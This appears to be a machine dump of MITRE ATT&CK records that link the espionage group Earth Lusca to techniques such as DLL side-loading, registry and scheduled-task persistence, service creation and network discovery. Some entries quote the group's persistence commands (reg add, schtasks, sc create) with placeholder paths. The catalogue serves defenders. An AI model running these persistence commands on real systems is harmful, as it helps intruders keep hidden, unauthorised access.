relationship_id : relationship--2bb7ed69-8f59-47f3-8d86-f1c1202c7629
revoked : False
technique : Remote System Discovery
technique_description : Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as [Ping](https://attack.mitre.org/software/S0097) or net view using [Net](https://attack.mitre.org/software/S0039). Adversaries may also analyze data from local host files (ex: C:\Windows\System32\Drivers\etc\hosts or /etc/hosts) or other passive means (such as local [Arp](https://attack.mitre.org/software/S0099) cache entries) in order to discover the presence of remote systems in an environment. Adversaries may also target discovery of network infrastructure as well as leverage [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands on network devices to gather detailed information about systems within a network (e.g. show cdp neighbors, show arp).(Citation: US-CERT-TA18-106A)(Citation: CISA AR21-126A FIVEHANDS May 2021)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='discovery')]
technique_id : T1018
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows', 'Network']
data_sources : ['Command: Command Execution', 'File: File Access', 'Network Traffic: Network Connection Creation', 'Process: Process Creation']
----------------------------------------------------------------------------------------------------
technique_ref : attack-pattern--7e150503-88e7-4861-866b-ff1ac82c4475
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) employed a PowerShell script called RDPConnectionParser to read and filter the Windows event log “Microsoft-Windows-TerminalServices-RDPClient/Operational” (Event ID 1024) to obtain network information from RDP connections. [Earth Lusca](https://attack.mitre.org/groups/G1006) has also used [netstat](https://attack.mitre.org/software/S0104) from a compromised system to obtain network connection information.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--def0dc1a-1c41-44f0-a076-36fb1b98390c
revoked : False
technique : System Network Connections Discovery
technique_description : Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. An adversary who gains access to a system that is part of a cloud-based environment may map out Virtual Private Clouds or Virtual Networks in order to determine what systems and services are connected. The actions performed are likely the same types of discovery techniques depending on the operating system, but the resulting information may include details about the networked cloud environment relevant to the adversary's goals.
Cloud providers may have different ways in which their virtual networks operate.(Citation: Amazon AWS VPC Guide)(Citation: Microsoft Azure Virtual Network Overview)(Citation: Google VPC Overview) Similarly, adversaries who gain access to network devices may also perform similar discovery activities to gather information about connected systems and services. Utilities and commands that acquire this information include [netstat](https://attack.mitre.org/software/S0104), "net use," and "net session" with [Net](https://attack.mitre.org/software/S0039). In Mac and Linux, [netstat](https://attack.mitre.org/software/S0104) and lsof can be used to list current connections. who -a and w can be used to show which users are currently logged in, similar to "net session". Additionally, built-in features native to network devices and [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) may be used (e.g. show ip sockets, show tcp brief).(Citation: US-CERT-TA18-106A) tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='discovery')] technique_id : T1049 matrix : mitre-attack platform : ['Windows', 'IaaS', 'Linux', 'macOS', 'Network'] data_sources : ['Process: OS API Execution', 'Process: Process Creation', 'Command: Command Execution'] ---------------------------------------------------------------------------------------------------- type : intrusion-set id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034 created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 created : 2022-07-01T20:12:30.184Z modified : 2022-10-17T19:51:56.531Z name : Earth Lusca description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. 
[Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022) [Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022) aliases : ['Earth Lusca', 'TAG-22'] external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. 
Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}] object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'] x_mitre_attack_spec_version : 2.1.0 x_mitre_deprecated : False x_mitre_domains : ['enterprise-attack', 'mobile-attack'] x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_version : 1.0 technique_ref : attack-pattern--e64c62cf-9cd7-4a14-94ec-cdaac43ab44b relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has placed a malicious payload in `%WINDIR%\SYSTEM32\oci.dll` so it would be sideloaded by the MSDTC service.(Citation: TrendMicro EarthLusca 2022) relationship_id : relationship--7807639f-cc9f-4b0a-9f01-8161cbb1fd53 revoked : False technique : DLL Side-Loading technique_description : Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s). Side-loading takes advantage of the DLL search order used by the loader by positioning both the victim application and malicious payload(s) alongside each other. Adversaries likely use side-loading as a means of masking actions they perform under a legitimate, trusted, and potentially elevated system or software process. Benign executables used to side-load payloads may not be flagged during delivery and/or execution. 
Adversary payloads may also be encrypted/packed or otherwise obfuscated until loaded into the memory of the trusted process.(Citation: FireEye DLL Side-Loading) tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='persistence'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='privilege-escalation'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')] technique_id : T1574.002 matrix : mitre-attack platform : ['Windows'] data_sources : ['File: File Modification', 'Process: Process Creation', 'Module: Module Load', 'File: File Creation'] ---------------------------------------------------------------------------------------------------- type : intrusion-set id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034 created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 created : 2022-07-01T20:12:30.184Z modified : 2022-10-17T19:51:56.531Z name : Earth Lusca description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. 
Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022) [Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022) aliases : ['Earth Lusca', 'TAG-22'] external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. 
Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}] object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'] x_mitre_attack_spec_version : 2.1.0 x_mitre_deprecated : False x_mitre_domains : ['enterprise-attack', 'mobile-attack'] x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_version : 1.0 technique_ref : attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4 relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) modified the registry using the command reg add “HKEY_CURRENT_USER\Environment” /v UserInitMprLogonScript /t REG_SZ /d “[file path]” for persistence.(Citation: TrendMicro EarthLusca 2022) relationship_id : relationship--83aedf08-e8eb-4c18-80c1-727ddb0f1d07 revoked : False technique : Modify Registry technique_description : Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution. Access to specific areas of the Registry depends on account permissions, some requiring administrator-level access. The built-in Windows command-line utility [Reg](https://attack.mitre.org/software/S0075) may be used for local or remote Registry modification. (Citation: Microsoft Reg) Other tools may also be used, such as a remote access tool, which may contain functionality to interact with the Registry through the Windows API. Registry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via [Reg](https://attack.mitre.org/software/S0075) or other utilities using the Win32 API. (Citation: Microsoft Reghide NOV 2006) Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to maintain persistence. 
(Citation: TrendMicro POWELIKS AUG 2014) (Citation: SpectorOps Hiding Reg Jul 2017) The Registry of a remote system may be modified to aid in execution of files as part of lateral movement. It requires the remote Registry service to be running on the target system. (Citation: Microsoft Remote) Often [Valid Accounts](https://attack.mitre.org/techniques/T1078) are required, along with access to the remote system's [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) for RPC communication. tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')] technique_id : T1112 matrix : mitre-attack platform : ['Windows'] data_sources : ['Windows Registry: Windows Registry Key Modification', 'Process: OS API Execution', 'Network Traffic: Network Traffic Flow', 'Command: Command Execution', 'Windows Registry: Windows Registry Key Deletion', 'Windows Registry: Windows Registry Key Creation', 'Process: Process Creation'] ---------------------------------------------------------------------------------------------------- type : intrusion-set id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034 created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 created : 2022-07-01T20:12:30.184Z modified : 2022-10-17T19:51:56.531Z name : Earth Lusca description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. 
Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022) [Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022) aliases : ['Earth Lusca', 'TAG-22'] external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. 
Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}] object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'] x_mitre_attack_spec_version : 2.1.0 x_mitre_deprecated : False x_mitre_domains : ['enterprise-attack', 'mobile-attack'] x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_version : 1.0 technique_ref : attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9 relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) used the command schtasks /Create /SC ONLOgon /TN WindowsUpdateCheck /TR “[file path]” /ru system for persistence.(Citation: TrendMicro EarthLusca 2022) relationship_id : relationship--6f1c0538-c9f4-49ad-b934-0714b50c1c45 revoked : False technique : Scheduled Task/Job technique_description : Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security) Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges). 
Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218), adversaries have also abused task scheduling to potentially mask one-time execution under a trusted system process.(Citation: ProofPoint Serpent) tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='execution'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='persistence'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='privilege-escalation')] technique_id : T1053 matrix : mitre-attack platform : ['Windows', 'Linux', 'macOS', 'Containers'] data_sources : ['Scheduled Job: Scheduled Job Creation', 'File: File Creation', 'Process: Process Creation', 'Container: Container Creation', 'Command: Command Execution', 'File: File Modification'] permissions_required : ['Administrator', 'SYSTEM', 'User'] effective_permissions : ['SYSTEM', 'Administrator', 'User'] ---------------------------------------------------------------------------------------------------- type : intrusion-set id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034 created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 created : 2022-07-01T20:12:30.184Z modified : 2022-10-17T19:51:56.531Z name : Earth Lusca description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. 
Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022) [Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022) aliases : ['Earth Lusca', 'TAG-22'] external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. 
Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}] object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'] x_mitre_attack_spec_version : 2.1.0 x_mitre_deprecated : False x_mitre_domains : ['enterprise-attack', 'mobile-attack'] x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_version : 1.0 technique_ref : attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32 relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) created a service using the command sc create “SysUpdate” binpath= “cmd /c start “[file path]””&&sc config “SysUpdate” start= auto&&net start SysUpdate for persistence.(Citation: TrendMicro EarthLusca 2022) relationship_id : relationship--cd85a2d6-ebee-4ebd-9571-5cafcac15b05 revoked : False technique : Windows Service technique_description : Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.(Citation: TechNet Services) Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Adversaries may install a new service or modify an existing service to execute at startup in order to persist on a system. Service configurations can be set or modified using system utilities (such as sc.exe), by directly modifying the Registry, or by interacting directly with the Windows API. Adversaries may also use services to install and execute malicious drivers. 
For example, after dropping a driver file (ex: `.sys`) to disk, the payload can be loaded and registered via [Native API](https://attack.mitre.org/techniques/T1106) functions such as `CreateServiceW()` (or manually via functions such as `ZwLoadDriver()` and `ZwSetValueKey()`), by creating the required service Registry values (i.e. [Modify Registry](https://attack.mitre.org/techniques/T1112)), or by using command-line utilities such as `PnPUtil.exe`.(Citation: Symantec W.32 Stuxnet Dossier)(Citation: Crowdstrike DriveSlayer February 2022)(Citation: Unit42 AcidBox June 2020) Adversaries may leverage these drivers as [Rootkit](https://attack.mitre.org/techniques/T1014)s to hide the presence of malicious activity on a system. Adversaries may also load a signed yet vulnerable driver onto a compromised machine (known as "Bring Your Own Vulnerable Driver" (BYOVD)) as part of [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).(Citation: ESET InvisiMole June 2020)(Citation: Unit42 AcidBox June 2020) Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges. Adversaries may also directly start services through [Service Execution](https://attack.mitre.org/techniques/T1569/002). To make detection analysis more challenging, malicious services may also incorporate [Masquerade Task or Service](https://attack.mitre.org/techniques/T1036/004) (ex: using a service and/or payload name related to a legitimate OS or benign software component). 
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='persistence'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='privilege-escalation')] technique_id : T1543.003 matrix : mitre-attack platform : ['Windows'] data_sources : ['Windows Registry: Windows Registry Key Modification', 'Process: Process Creation', 'Network Traffic: Network Traffic Flow', 'Service: Service Creation', 'Command: Command Execution', 'File: File Metadata', 'Windows Registry: Windows Registry Key Creation', 'Driver: Driver Load', 'Service: Service Modification', 'Process: OS API Execution'] effective_permissions : ['Administrator', 'SYSTEM'] ---------------------------------------------------------------------------------------------------- type : intrusion-set id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034 created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 created : 2022-07-01T20:12:30.184Z modified : 2022-10-17T19:51:56.531Z name : Earth Lusca description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. 
Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022) [Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022) aliases : ['Earth Lusca', 'TAG-22'] external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. 
Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}] object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'] x_mitre_attack_spec_version : 2.1.0 x_mitre_deprecated : False x_mitre_domains : ['enterprise-attack', 'mobile-attack'] x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_version : 1.0 technique_ref : attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0 relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) used the command ipconfig to obtain information about network configurations.(Citation: TrendMicro EarthLusca 2022) relationship_id : relationship--e13ab711-012c-4405-87ae-f096d770e367 revoked : False technique : System Network Configuration Discovery technique_description : Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include [Arp](https://attack.mitre.org/software/S0099), [ipconfig](https://attack.mitre.org/software/S0100)/[ifconfig](https://attack.mitre.org/software/S0101), [nbtstat](https://attack.mitre.org/software/S0102), and [route](https://attack.mitre.org/software/S0103). Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather information about configurations and settings, such as IP addresses of configured interfaces and static/dynamic routes (e.g. 
show ip route, show ip interface).(Citation: US-CERT-TA18-106A)(Citation: Mandiant APT41 Global Intrusion ) Adversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016) during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next. tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='discovery')] technique_id : T1016 matrix : mitre-attack platform : ['Linux', 'macOS', 'Windows', 'Network'] data_sources : ['Command: Command Execution', 'Script: Script Execution', 'Process: Process Creation', 'Process: OS API Execution'] ---------------------------------------------------------------------------------------------------- type : intrusion-set id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034 created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 created : 2022-07-01T20:12:30.184Z modified : 2022-10-17T19:51:56.531Z name : Earth Lusca description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. 
Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022) [Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022) aliases : ['Earth Lusca', 'TAG-22'] external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. 
Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}] object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'] x_mitre_attack_spec_version : 2.1.0 x_mitre_deprecated : False x_mitre_domains : ['enterprise-attack', 'mobile-attack'] x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_version : 1.0 technique_ref : attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104 relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) collected information on user accounts via the whoami command.(Citation: TrendMicro EarthLusca 2022) relationship_id : relationship--5fc9189b-7c9b-43f7-8d60-96a1f497e395 revoked : False technique : System Owner/User Discovery technique_description : Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. Various utilities and commands may acquire this information, including whoami. In macOS and Linux, the currently logged in user can be identified with w and who. On macOS the dscl . list /Users | grep -v '_' command can also be used to enumerate user accounts. 
Environment variables, such as %USERNAME% and $USER, may also be used to access this information. On network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show users` and `show ssh` can be used to display users currently logged into the device.(Citation: show_ssh_users_cmd_cisco)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018) tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='discovery')] technique_id : T1033 matrix : mitre-attack platform : ['Linux', 'macOS', 'Windows', 'Network'] data_sources : ['Active Directory: Active Directory Object Access', 'Process: OS API Execution', 'Command: Command Execution', 'Network Traffic: Network Traffic Content', 'Process: Process Creation', 'Network Traffic: Network Traffic Flow', 'Windows Registry: Windows Registry Key Access', 'File: File Access', 'Process: Process Access'] ---------------------------------------------------------------------------------------------------- type : intrusion-set id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034 created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 created : 2022-07-01T20:12:30.184Z modified : 2022-10-17T19:51:56.531Z name : Earth Lusca description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. 
